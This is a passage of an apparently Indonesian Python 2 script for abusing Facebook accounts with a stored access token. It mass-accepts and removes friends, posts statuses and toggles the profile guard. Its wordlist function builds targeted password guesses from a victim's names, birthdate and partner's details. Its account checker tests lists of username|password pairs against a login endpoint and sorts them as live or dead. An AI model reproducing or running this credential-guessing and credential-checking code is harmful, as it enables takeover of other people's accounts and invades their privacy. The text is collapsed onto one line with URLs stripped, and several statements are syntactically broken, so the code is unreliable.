\x1b[1;97mSelesai' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_bot() def accept(): os.system('reset') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() os.system('reset') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ') r = requests.get('' + limit + '&access_token=' + toket) teman = json.loads(r.text) if '[]' in str(teman['data']): print '\x1b[1;91m[!] Tidak ada permintaan pertemanan' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_bot() jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') print 40 * '\x1b[1;97m\xe2\x95\x90' for i in teman['data']: gas ='' + i['from']['id'] + '?access_token=' + toket) a = json.loads(gas.text) if 'error' in str(a): print '\x1b[1;91m[+] \x1b[1;92mNama \x1b[1;91m:\x1b[1;97m ' + i['from']['name'] print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;91m Gagal' print 40 * '\x1b[1;97m\xe2\x95\x90' else: print '\x1b[1;91m[+] \x1b[1;92mNama \x1b[1;91m:\x1b[1;97m ' + i['from']['name'] print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;92m Berhasil' print 40 * '\x1b[1;97m\xe2\x95\x90' print '\n\x1b[1;91m[+] \x1b[1;97mSelesai' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_bot() def unfriend(): os.system('reset') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('reset') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;97mStop \x1b[1;91mCTRL+C' print try: pek = requests.get('' + toket) cok = json.loads(pek.text) for i in cok['data']: nama = i['name'] id = i['id'] requests.delete('' + id + '&access_token=' + toket) print '\x1b[1;97m[\x1b[1;92mTerhapus\x1b[1;97m] ' + nama + ' => ' + id except IndexError: pass except KeyboardInterrupt: print '\x1b[1;91m[!] Terhenti' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_bot() print '\n\x1b[1;91m[+] \x1b[1;97mSelesai' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_bot() def lain(): os.system('reset') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() os.system('reset') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;37;40m1. Buat postingan' print '\x1b[1;37;40m2. Buat Wordlist' print '\x1b[1;37;40m3. Akun Checker' print '\x1b[1;37;40m4. Lihat daftar grup' print '\x1b[1;37;40m5. Profile Guard' print print '\x1b[1;97m ->Coming soon<-' print print '\x1b[1;31;40m0. Kembali' print pilih_lain() def pilih_lain(): other = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ') if other == '': print '\x1b[1;91m[!] Jangan kosong' pilih_lain() else: if other == '1': status() else: if other == '2': wordlist() else: if other == '3': check_akun() else: if other == '4': grupsaya() else: if other == '5': guard() else: if other == '0': menu() else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + other + ' \x1b[1;91mTidak ada' pilih_lain() def status(): os.system('reset') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() os.system('reset') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' msg = raw_input('\x1b[1;91m[+] \x1b[1;92mKetik status \x1b[1;91m:\x1b[1;97m ') if msg == '': print '\x1b[1;91m[!] Jangan kosong' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') lain() else: res = requests.get('' + msg + '&access_token=' + toket) op = json.loads(res.text) jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[+] \x1b[1;92mStatus ID\x1b[1;91m : \x1b[1;97m' + op['id'] raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') lain() def wordlist(): os.system('reset') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() else: try: os.system('reset') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[?] \x1b[1;92mIsi data lengkap target dibawah' print 40 * '\x1b[1;97m\xe2\x95\x90' a = raw_input('\x1b[1;91m[+] \x1b[1;92mNama Depan \x1b[1;97m: ') file = open(a + '.txt', 'w') b = raw_input('\x1b[1;91m[+] \x1b[1;92mNama Tengah \x1b[1;97m: ') c = raw_input('\x1b[1;91m[+] \x1b[1;92mNama Belakang \x1b[1;97m: ') d = raw_input('\x1b[1;91m[+] \x1b[1;92mNama Panggilan \x1b[1;97m: ') e = raw_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ') f = e[0:2] g = e[2:4] h = e[4:] print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[?] \x1b[1;93mKalo Jomblo SKIP aja :v' i = raw_input('\x1b[1;91m[+] \x1b[1;92mNama Pacar \x1b[1;97m: ') j = raw_input('\x1b[1;91m[+] \x1b[1;92mNama Panggilan Pacar \x1b[1;97m: ') k = raw_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir Pacar >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') l = k[0:2] m = k[2:4] n = k[4:] file.write('%s%s\n%s%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s' % (a, c, a, b, b, a, b, c, c, a, c, b, a, a, b, b, c, c, a, d, b, d, c, d, d, d, d, a, d, b, d, c, a, e, a, f, a, g, a, h, b, e, b, f, b, g, b, h, c, e, c, f, c, g, c, h, d, e, d, f, d, g, d, h, e, a, f, a, g, a, h, a, e, b, f, b, g, b, h, b, e, c, f, c, g, c, h, c, e, d, f, d, g, d, h, d, d, d, a, f, g, a, g, h, f, g, f, h, f, f, g, f, g, h, g, g, h, f, h, g, h, h, h, g, f, a, g, h, b, f, g, b, g, h, c, f, g, c, g, h, d, f, g, d, g, h, a, i, a, j, a, k, i, e, i, j, i, k, b, i, b, j, b, k, c, i, c, j, c, k, e, k, j, a, j, b, j, c, j, d, j, j, k, a, k, b, k, c, k, d, k, k, i, l, i, m, i, n, j, l, j, m, j, n, j, k)) wg = 0 while wg < 100: wg = wg + 1 file.write(a + str(wg) + '\n') en = 0 while en < 100: en = en + 1 file.write(i + str(en) + '\n') word = 0 while word < 100: word = word + 1 file.write(d + str(word) + '\n') gen = 0 while gen < 100: gen = gen + 1 file.write(j + str(gen) + '\n') file.close() time.sleep(1.5) print '\n\x1b[1;91m[+] \x1b[1;97mTersimpan \x1b[1;91m: \x1b[1;97m %s.txt' % a raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') lain() except IOError as e: print '\x1b[1;91m[!] Gagal membuat file' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') lain() def check_akun(): os.system('reset') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('reset') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[?] \x1b[1;92mIsi File\x1b[1;91m : \x1b[1;97musername|password' print 40 * '\x1b[1;97m\xe2\x95\x90' live = [] cek = [] die = [] try: file = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m:\x1b[1;97m ') list = open(file, 'r').readlines() except IOError: print '\x1b[1;91m[!] File tidak ditemukan' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') lain() pemisah = raw_input('\x1b[1;91m[+] \x1b[1;92mPemisah \x1b[1;91m:\x1b[1;97m ') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') print 40 * '\x1b[1;97m\xe2\x95\x90' for meki in list: username, password = meki.strip().split(str(pemisah)) url = '' + username + '&locale=en_US&password=' + password + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6' data = requests.get(url) mpsh = json.loads(data.text) if 'access_token' in mpsh: live.append(password) print '\x1b[1;97m[\x1b[1;92mLive\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password elif '' in mpsh['error_msg']: cek.append(password) print '\x1b[1;97m[\x1b[1;93mCheck\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password else: die.append(password) print '\x1b[1;97m[\x1b[1;91mMati\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password print '\n\x1b[1;91m[+] \x1b[1;97mTotal\x1b[1;91m : \x1b[1;97mLive=\x1b[1;92m' + str(len(live)) + ' \x1b[1;97mCheck=\x1b[1;93m' + str(len(cek)) + ' \x1b[1;97mDie=\x1b[1;91m' + str(len(die)) raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') lain() def grupsaya(): os.system('reset') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('reset') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') print 40 * '\x1b[1;97m\xe2\x95\x90' try: uh = requests.get('' + toket) gud = json.loads(uh.text) for p in gud['data']: nama = p['name'] id = p['id'] f = open('grupid.txt', 'w') listgrup.append(id) f.write(id + '\n') print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama \x1b[1;91m:\x1b[1;97m ' + str(nama) print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + str(id) print 40 * '\x1b[1;97m=' print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah Grup \x1b[1;96m%s' % len(listgrup) print '\x1b[1;91m[+] \x1b[1;97mTersimpan \x1b[1;91m: \x1b[1;97mgrupid.txt' f.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') lain() except (KeyboardInterrupt, EOFError): print '\x1b[1;91m[!] Terhenti' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') lain() except KeyError: os.remove('grupid.txt') print '\x1b[1;91m[!] Grup tidak ditemukan' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') lain() except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi' keluar() except IOError: print '\x1b[1;91m[!] Kesalahan saat membuat file' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') lain() def guard(): global toket os.system('reset') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() os.system('reset') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;37;40m1. Aktifkan' print '\x1b[1;37;40m2. NonAktifkan' print '\x1b[1;31;40m0. Kembali' print g = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ') if g == '1': aktif = 'true' gaz(toket, aktif) else: if g == '2': non = 'false' gaz(toket, non) else: if g == '0': lain() else: if g == '': keluar() else: keluar() def get_userid(toket): url = '' % toket res = requests.get(url) uid = json.loads(res.text) return uid['id'] def gaz(toket, enable=True): id = get_userid(toket) data = 'variables={"0":{"is_shielded": %s,"session_id":"9b78191c-84fd-4ab6-b0aa-19b39f04a6bc","actor_id":"%s","client_mutation_id":"b0316dd6-3fd6-4beb-aed4-bb29c5dc64b0"}}&method=post&doc_id=1477043292367183&query_name=IsShieldedSetMutation&strip_defaults=true&strip_nulls=true&locale=en_US&client_country_code=US&fb_api_req_friendly_name=IsShieldedSetMutation&fb_api_caller_class=IsShieldedSetMutation' % (enable, str(id)) headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Authorization': 'OAuth %s' % toket} url = '' res =, data=data, headers=headers) print res.text if '"is_shielded":true' in res.text: os.system('reset') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mDiaktifkan' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') lain() else: if '"is_shielded":false' in res.text: os.system('reset') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;91mDinonaktifkan' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') lain() else: print '\x1b[1;91m[!] Error' keluar() if __name__ == '__main__': login()

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